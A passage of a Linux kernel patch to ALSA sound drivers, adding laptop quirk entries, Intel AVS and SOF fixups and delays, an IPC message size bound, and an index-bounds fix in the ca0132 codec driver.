+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -4228,8 +4228,10 @@ static int tuning_ctl_set(struct hda_codec *codec, hda_nid_t nid,
+ 
+ 	for (i = 0; i < TUNING_CTLS_COUNT; i++)
+ 		if (nid == ca0132_tuning_ctls[i].nid)
+-			break;
++			goto found;
+ 
++	return -EINVAL;
++found:
+ 	snd_hda_power_up(codec);
+ 	dspio_set_param(codec, ca0132_tuning_ctls[i].mid, 0x20,
+ 			ca0132_tuning_ctls[i].req,
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 75e1d00074b9f..a889cccdd607c 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -980,7 +980,10 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3905, "Lenovo G50-30", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x390b, "Lenovo G50-80", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3975, "Lenovo U300s", CXT_FIXUP_STEREO_DMIC),
+-	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_PINCFG_LENOVO_NOTEBOOK),
++	/* NOTE: we'd need to extend the quirk for 17aa:3977 as the same
++	 * PCI SSID is used on multiple Lenovo models
++	 */
++	SND_PCI_QUIRK(0x17aa, 0x3977, "Lenovo IdeaPad U310", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3978, "Lenovo G50-70", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x397b, "Lenovo S205", CXT_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK_VENDOR(0x17aa, "Thinkpad", CXT_FIXUP_THINKPAD_ACPI),
+@@ -1003,6 +1006,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_MUTE_LED_GPIO, .name = "mute-led-gpio" },
+ 	{ .id = CXT_FIXUP_HP_ZBOOK_MUTE_LED, .name = "hp-zbook-mute-led" },
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
++	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 28ac6c159b2a2..070150bbd3559 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2631,6 +2631,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x65e5, "Clevo PC50D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f1, "Clevo PC50HS", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65f5, "Clevo PD50PN[NRT]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
++	SND_PCI_QUIRK(0x1558, 0x66a2, "Clevo PE60RNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67d1, "Clevo PB71[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e1, "Clevo PB71[DE][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x67e5, "Clevo PC70D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -2651,6 +2652,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x96e1, "Clevo P960[ER][CDFN]-K", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e1, "Clevo P970[ER][CDFN]", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e2, "Clevo P970RC-M", ALC1220_FIXUP_CLEVO_P950),
++	SND_PCI_QUIRK(0x1558, 0xd502, "Clevo PD50SNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK_VENDOR(0x1558, "Clevo laptop", ALC882_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x161f, 0x2054, "Medion laptop", ALC883_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Y530", ALC882_FIXUP_LENOVO_Y530),
+@@ -9574,6 +9576,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5101, "Clevo S510WU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70f2, "Clevo NH79EPY", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9608,6 +9611,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x971d, "Clevo N970T[CDF]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa500, "Clevo NL5[03]RU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb022, "Clevo NH77D[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9708,6 +9712,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x511e, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x511f, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x9e54, "LENOVO NB", ALC269_FIXUP_LENOVO_EAPD),
++	SND_PCI_QUIRK(0x17aa, 0x9e56, "Lenovo ZhaoYang CF4620Z", ALC286_FIXUP_SONY_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1849, 0x1233, "ASRock NUC Box 1100", ALC233_FIXUP_NO_AUDIO_JACK),
+ 	SND_PCI_QUIRK(0x1849, 0xa233, "Positivo Master C6300", ALC269_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x19e5, 0x3204, "Huawei MACH-WX9", ALC256_FIXUP_HUAWEI_MACH_WX9_PINS),
+diff --git a/sound/pci/ymfpci/ymfpci.c b/sound/pci/ymfpci/ymfpci.c
+index 1e198e4d57b8d..82d4e0fda91be 100644
+--- a/sound/pci/ymfpci/ymfpci.c
++++ b/sound/pci/ymfpci/ymfpci.c
+@@ -170,7 +170,7 @@ static int snd_card_ymfpci_probe(struct pci_dev *pci,
+ 		return -ENOENT;
+ 	}
+ 
+-	err = snd_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
++	err = snd_devm_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
+ 			   sizeof(*chip), &card);
+ 	if (err < 0)
+ 		return err;
+diff --git a/sound/pci/ymfpci/ymfpci_main.c b/sound/pci/ymfpci/ymfpci_main.c
+index c80114c0ad7bf..b492c32ce0704 100644
+--- a/sound/pci/ymfpci/ymfpci_main.c
++++ b/sound/pci/ymfpci/ymfpci_main.c
+@@ -2165,7 +2165,7 @@ static int snd_ymfpci_memalloc(struct snd_ymfpci *chip)
+ 	chip->work_base = ptr;
+ 	chip->work_base_addr = ptr_addr;
+ 	
+-	snd_BUG_ON(ptr + chip->work_size !=
++	snd_BUG_ON(ptr + PAGE_ALIGN(chip->work_size) !=
+ 		   chip->work_ptr->area + chip->work_ptr->bytes);
+ 
+ 	snd_ymfpci_writel(chip, YDSXGR_PLAYCTRLBASE, chip->bank_base_playback_addr);
+diff --git a/sound/soc/codecs/hdmi-codec.c b/sound/soc/codecs/hdmi-codec.c
+index 74cbbe16f9aec..a22f2ec95901f 100644
+--- a/sound/soc/codecs/hdmi-codec.c
++++ b/sound/soc/codecs/hdmi-codec.c
+@@ -428,8 +428,13 @@ static int hdmi_codec_startup(struct snd_pcm_substream *substream,
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_dai_get_drvdata(dai);
+ 	bool tx = substream->stream == SNDRV_PCM_STREAM_PLAYBACK;
++	bool has_capture = !hcp->hcd.no_i2s_capture;
++	bool has_playback = !hcp->hcd.no_i2s_playback;
+ 	int ret = 0;
+ 
++	if (!((has_playback && tx) || (has_capture && !tx)))
++		return 0;
++
+ 	mutex_lock(&hcp->lock);
+ 	if (hcp->busy) {
+ 		dev_err(dai->dev, "Only one simultaneous stream supported!\n");
+@@ -468,6 +473,12 @@ static void hdmi_codec_shutdown(struct snd_pcm_substream *substream,
+ 				struct snd_soc_dai *dai)
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_dai_get_drvdata(dai);
++	bool tx = substream->stream == SNDRV_PCM_STREAM_PLAYBACK;
++	bool has_capture = !hcp->hcd.no_i2s_capture;
++	bool has_playback = !hcp->hcd.no_i2s_playback;
++
++	if (!((has_playback && tx) || (has_capture && !tx)))
++		return;
+ 
+ 	hcp->chmap_idx = HDMI_CODEC_CHMAP_IDX_UNKNOWN;
+ 	hcp->hcd.ops->audio_shutdown(dai->dev->parent, hcp->hcd.data);
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 2449a2df66df0..8facdb922f076 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -242,7 +242,7 @@ enum {
+ 
+ struct tx_mute_work {
+ 	struct tx_macro *tx;
+-	u32 decimator;
++	u8 decimator;
+ 	struct delayed_work dwork;
+ };
+ 
+@@ -635,7 +635,7 @@ exit:
+ 	return 0;
+ }
+ 
+-static bool is_amic_enabled(struct snd_soc_component *component, int decimator)
++static bool is_amic_enabled(struct snd_soc_component *component, u8 decimator)
+ {
+ 	u16 adc_mux_reg, adc_reg, adc_n;
+ 
+@@ -849,7 +849,7 @@ static int tx_macro_enable_dec(struct snd_soc_dapm_widget *w,
+ 			       struct snd_kcontrol *kcontrol, int event)
+ {
+ 	struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm);
+-	unsigned int decimator;
++	u8 decimator;
+ 	u16 tx_vol_ctl_reg, dec_cfg_reg, hpf_gate_reg, tx_gain_ctl_reg;
+ 	u8 hpf_cut_off_freq;
+ 	int hpf_delay = TX_MACRO_DMIC_HPF_DELAY_MS;
+@@ -1064,7 +1064,8 @@ static int tx_macro_hw_params(struct snd_pcm_substream *substream,
+ 			      struct snd_soc_dai *dai)
+ {
+ 	struct snd_soc_component *component = dai->component;
+-	u32 decimator, sample_rate;
++	u32 sample_rate;
++	u8 decimator;
+ 	int tx_fs_rate;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+ 
+@@ -1128,7 +1129,7 @@ static int tx_macro_digital_mute(struct snd_soc_dai *dai, int mute, int stream)
+ {
+ 	struct snd_soc_component *component = dai->component;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+-	u16 decimator;
++	u8 decimator;
+ 
+ 	/* active decimator not set yet */
+ 	if (tx->active_decimator[dai->id] == -1)
+diff --git a/sound/soc/intel/avs/boards/da7219.c b/sound/soc/intel/avs/boards/da7219.c
+index acd43b6108e99..1a1d572cc1d02 100644
+--- a/sound/soc/intel/avs/boards/da7219.c
++++ b/sound/soc/intel/avs/boards/da7219.c
+@@ -117,6 +117,26 @@ static void avs_da7219_codec_exit(struct snd_soc_pcm_runtime *rtd)
+ 	snd_soc_component_set_jack(asoc_rtd_to_codec(rtd, 0)->component, NULL, NULL);
+ }
+ 
++static int
++avs_da7219_be_fixup(struct snd_soc_pcm_runtime *runtime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 24 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S24_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -148,6 +168,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_da7219_be_fixup;
+ 	dl->init = avs_da7219_codec_init;
+ 	dl->exit = avs_da7219_codec_exit;
+ 	dl->nonatomic = 1;
+diff --git a/sound/soc/intel/avs/boards/max98357a.c b/sound/soc/intel/avs/boards/max98357a.c
+index 921f42caf7e09..183123d08c5a3 100644
+--- a/sound/soc/intel/avs/boards/max98357a.c
++++ b/sound/soc/intel/avs/boards/max98357a.c
+@@ -8,6 +8,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
++#include <sound/pcm_params.h>
+ #include <sound/soc.h>
+ #include <sound/soc-acpi.h>
+ #include <sound/soc-dapm.h>
+@@ -24,6 +25,26 @@ static const struct snd_soc_dapm_route card_base_routes[] = {
+ 	{ "Spk", NULL, "Speaker" },
+ };
+ 
++static int
++avs_max98357a_be_fixup(struct snd_soc_pcm_runtime *runtime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 16 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S16_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -55,6 +76,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_max98357a_be_fixup;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+ 	dl->dpcm_playback = 1;
+diff --git a/sound/soc/intel/avs/boards/nau8825.c b/sound/soc/intel/avs/boards/nau8825.c
+index 6731d8a490767..49438a67a77c6 100644
+--- a/sound/soc/intel/avs/boards/nau8825.c
++++ b/sound/soc/intel/avs/boards/nau8825.c
+@@ -33,15 +33,15 @@ avs_nau8825_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *co
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!SND_SOC_DAPM_EVENT_ON(event)) {
++	if (SND_SOC_DAPM_EVENT_ON(event))
++		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
++					     SND_SOC_CLOCK_IN);
++	else
+ 		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0) {
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-			return ret;
+-		}
+-	}
++	if (ret < 0)
++		dev_err(card->dev, "Set sysclk failed: %d\n", ret);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static const struct snd_kcontrol_new card_controls[] = {
+diff --git a/sound/soc/intel/avs/boards/rt5682.c b/sound/soc/intel/avs/boards/rt5682.c
+index 473e9fe5d0bf7..b2c2ba93dcb56 100644
+--- a/sound/soc/intel/avs/boards/rt5682.c
++++ b/sound/soc/intel/avs/boards/rt5682.c
+@@ -169,6 +169,27 @@ static const struct snd_soc_ops avs_rt5682_ops = {
+ 	.hw_params = avs_rt5682_hw_params,
+ };
+ 
++static int
++avs_rt5682_be_fixup(struct snd_soc_pcm_runtime *runtime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSPN to 24 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S24_LE);
++
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -201,6 +222,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->id = 0;
+ 	dl->init = avs_rt5682_codec_init;
+ 	dl->exit = avs_rt5682_codec_exit;
++	dl->be_hw_params_fixup = avs_rt5682_be_fixup;
+ 	dl->ops = &avs_rt5682_ops;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+diff --git a/sound/soc/intel/avs/boards/ssm4567.c b/sound/soc/intel/avs/boards/ssm4567.c
+index c5db696127624..2b7f5ad92aca7 100644
+--- a/sound/soc/intel/avs/boards/ssm4567.c
++++ b/sound/soc/intel/avs/boards/ssm4567.c
+@@ -15,7 +15,6 @@
+ #include <sound/soc-acpi.h>
+ #include "../../../codecs/nau8825.h"
+ 
+-#define SKL_NUVOTON_CODEC_DAI	"nau8825-hifi"
+ #define SKL_SSM_CODEC_DAI	"ssm4567-hifi"
+ 
+ static struct snd_soc_codec_conf card_codec_conf[] = {
+@@ -34,41 +33,11 @@ static const struct snd_kcontrol_new card_controls[] = {
+ 	SOC_DAPM_PIN_SWITCH("Right Speaker"),
+ };
+ 
+-static int
+-platform_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *control, int event)
+-{
+-	struct snd_soc_dapm_context *dapm = w->dapm;
+-	struct snd_soc_card *card = dapm->card;
+-	struct snd_soc_dai *codec_dai;
+-	int ret;
+-
+-	codec_dai = snd_soc_card_get_codec_dai(card, SKL_NUVOTON_CODEC_DAI);
+-	if (!codec_dai) {
+-		dev_err(card->dev, "Codec dai not found\n");
+-		return -EINVAL;
+-	}
+-
+-	if (SND_SOC_DAPM_EVENT_ON(event)) {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
+-					     SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	} else {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	}
+-
+-	return ret;
+-}
+-
+ static const struct snd_soc_dapm_widget card_widgets[] = {
+ 	SND_SOC_DAPM_SPK("Left Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("Right Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("DP1", NULL),
+ 	SND_SOC_DAPM_SPK("DP2", NULL),
+-	SND_SOC_DAPM_SUPPLY("Platform Clock", SND_SOC_NOPM, 0, 0, platform_clock_control,
+-			    SND_SOC_DAPM_PRE_PMU | SND_SOC_DAPM_POST_PMD),
+ };
+ 
+ static const struct snd_soc_dapm_route card_base_routes[] = {
+diff --git a/sound/soc/sof/intel/hda-ctrl.c b/sound/soc/sof/intel/hda-ctrl.c
+index 3aea36c077c9d..f3bdeba284122 100644
+--- a/sound/soc/sof/intel/hda-ctrl.c
++++ b/sound/soc/sof/intel/hda-ctrl.c
+@@ -196,12 +196,15 @@ int hda_dsp_ctrl_init_chip(struct snd_sof_dev *sdev)
+ 		goto err;
+ 	}
+ 
++	usleep_range(500, 1000);
++
+ 	/* exit HDA controller reset */
+ 	ret = hda_dsp_ctrl_link_reset(sdev, false);
+ 	if (ret < 0) {
+ 		dev_err(sdev->dev, "error: failed to exit HDA controller reset\n");
+ 		goto err;
+ 	}
++	usleep_range(1000, 1200);
+ 
+ 	hda_codec_detect_mask(sdev);
+ 
+diff --git a/sound/soc/sof/intel/hda-dsp.c b/sound/soc/sof/intel/hda-dsp.c
+index b4eacae8564c8..6b2094f74c9c0 100644
+--- a/sound/soc/sof/intel/hda-dsp.c
++++ b/sound/soc/sof/intel/hda-dsp.c
+@@ -399,6 +399,12 @@ static int hda_dsp_update_d0i3c_register(struct snd_sof_dev *sdev, u8 value)
+ 	snd_sof_dsp_update8(sdev, HDA_DSP_HDA_BAR, chip->d0i3_offset,
+ 			    SOF_HDA_VS_D0I3C_I3, value);
+ 
++	/*
++	 * The value written to the D0I3C::I3 bit may not be taken into account immediately.
++	 * A delay is recommended before checking if D0I3C::CIP is cleared
++	 */
++	usleep_range(30, 40);
++
+ 	/* Wait for cmd in progress to be cleared before exiting the function */
+ 	ret = hda_dsp_wait_d0i3c_done(sdev);
+ 	if (ret < 0) {
+@@ -407,6 +413,12 @@ static int hda_dsp_update_d0i3c_register(struct snd_sof_dev *sdev, u8 value)
+ 	}
+ 
+ 	reg = snd_sof_dsp_read8(sdev, HDA_DSP_HDA_BAR, chip->d0i3_offset);
++	/* Confirm d0i3 state changed with paranoia check */
++	if ((reg ^ value) & SOF_HDA_VS_D0I3C_I3) {
++		dev_err(sdev->dev, "failed to update D0I3C!\n");
++		return -EIO;
++	}
++
+ 	trace_sof_intel_D0I3C_updated(sdev, reg);
+ 
+ 	return 0;
+diff --git a/sound/soc/sof/intel/pci-tng.c b/sound/soc/sof/intel/pci-tng.c
+index 5b2b409752c58..8c22a00266c06 100644
+--- a/sound/soc/sof/intel/pci-tng.c
++++ b/sound/soc/sof/intel/pci-tng.c
+@@ -75,11 +75,7 @@ static int tangier_pci_probe(struct snd_sof_dev *sdev)
+ 
+ 	/* LPE base */
+ 	base = pci_resource_start(pci, desc->resindex_lpe_base) - IRAM_OFFSET;
+-	size = pci_resource_len(pci, desc->resindex_lpe_base);
+-	if (size < PCI_BAR_SIZE) {
+-		dev_err(sdev->dev, "error: I/O region is too small.\n");
+-		return -ENODEV;
+-	}
++	size = PCI_BAR_SIZE;
+ 
+ 	dev_dbg(sdev->dev, "LPE PHY base at 0x%x size 0x%x", base, size);
+ 	sdev->bar[DSP_BAR] = devm_ioremap(sdev->dev, base, size);
+diff --git a/sound/soc/sof/ipc3.c b/sound/soc/sof/ipc3.c
+index 1fef4dcc09368..fde8af5a1f485 100644
+--- a/sound/soc/sof/ipc3.c
++++ b/sound/soc/sof/ipc3.c
+@@ -970,8 +970,9 @@ static void sof_ipc3_rx_msg(struct snd_sof_dev *sdev)
+ 		return;
+ 	}
+ 
+-	if (hdr.size < sizeof(hdr)) {
+-		dev_err(sdev->dev, "The received message size is invalid\n");
++	if (hdr.size < sizeof(hdr) || hdr.size > SOF_IPC_MSG_MAX_SIZE) {
++		dev_err(sdev->dev, "The received message size is invalid: %u\n",
++			hdr.size);
+ 		return;
+ 	}
+ 
+diff --git a/sound/soc/sof/ipc4-control.c b/sound/soc/sof/ipc4-control.c
+index 0d5a578c34962..7442ec1c5a4d4 100644
+--- a/sound/soc/sof/ipc4-control.c
++++ b/sound/soc/sof/ipc4-control.c
+@@ -84,7 +84,8 @@ sof_ipc4_set_volume_data(struct snd_sof_dev *sdev, struct snd_sof_widget *swidge
+ 		}
+ 
+ 		/* set curve type and duration from topology */
+-		data.curve_duration = gain->data.curve_duration;
++		data.curve_duration_l = gain->data.curve_duration_l;
++		data.curve_duration_h = gain->data.curve_duration_h;
+ 		data.curve_type = gain->data.curve_type;
+ 
+ 		msg->data_ptr = &data;
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index 59f4d42f9011e..6da6137fa2cbc 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -107,7 +107,7 @@ static const struct sof_topology_token gain_tokens[] = {
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, curve_type)},
+ 	{SOF_TKN_GAIN_RAMP_DURATION,
+ 		SND_SOC_TPLG_TUPLE_TYPE_WORD, get_token_u32,
+-		offsetof(struct sof_ipc4_gain_data, curve_duration)},
++		offsetof(struct sof_ipc4_gain_data, curve_duration_l)},
+ 	{SOF_TKN_GAIN_VAL, SND_SOC_TPLG_TUPLE_TYPE_WORD,
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, init_val)},
+ };
+@@ -155,7 +155,7 @@ static void sof_ipc4_dbg_audio_format(struct device *dev,
+ 	for (i = 0; i < num_format; i++, ptr = (u8 *)ptr + object_size) {
+ 		fmt = ptr;
+ 		dev_dbg(dev,
+-			" #%d: %uKHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
++			" #%d: %uHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
+ 			i, fmt->sampling_frequency, fmt->bit_depth, fmt->ch_map,
+ 			fmt->ch_cfg, fmt->interleaving_style, fmt->fmt_cfg);
+ 	}
+@@ -670,7 +670,7 @@ static int sof_ipc4_widget_setup_comp_pga(struct snd_sof_widget *swidget)
+ 
+ 	dev_dbg(scomp->dev,
+ 		"pga widget %s: ramp type: %d, ramp duration %d, initial gain value: %#x, cpc %d\n",
+-		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration,
++		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration_l,
+ 		gain->data.init_val, gain->base_config.cpc);
+ 
+ 	ret = sof_ipc4_widget_setup_msg(swidget, &gain->msg);
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 2363a7cc0b57d..cf9d278524572 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -217,14 +217,16 @@ struct sof_ipc4_control_data {
+  * @init_val: Initial value
+  * @curve_type: Curve type
+  * @reserved: reserved for future use
+- * @curve_duration: Curve duration
++ * @curve_duration_l: Curve duration low part
++ * @curve_duration_h: Curve duration high part
+  */
+ struct sof_ipc4_gain_data {
+ 	uint32_t channels;
+ 	uint32_t init_val;
+ 	uint32_t curve_type;
+ 	uint32_t reserved;
+-	uint32_t curve_duration;
++	uint32_t curve_duration_l;
++	uint32_t curve_duration_h;
+ } __aligned(8);
+ 
+ /**
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 419302e2057e8..647fa054d8b1d 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -455,8 +455,8 @@ static void push_back_to_ready_list(struct snd_usb_endpoint *ep,
+  * This function is used both for implicit feedback endpoints and in low-
+  * latency playback mode.
+  */
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock)
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock)
+ {
+ 	bool implicit_fb = snd_usb_endpoint_implicit_feedback_sink(ep);
+ 
+@@ -480,7 +480,7 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 		spin_unlock_irqrestore(&ep->lock, flags);
+ 
+ 		if (ctx == NULL)
+-			return;
++			break;
+ 
+ 		/* copy over the length information */
+ 		if (implicit_fb) {
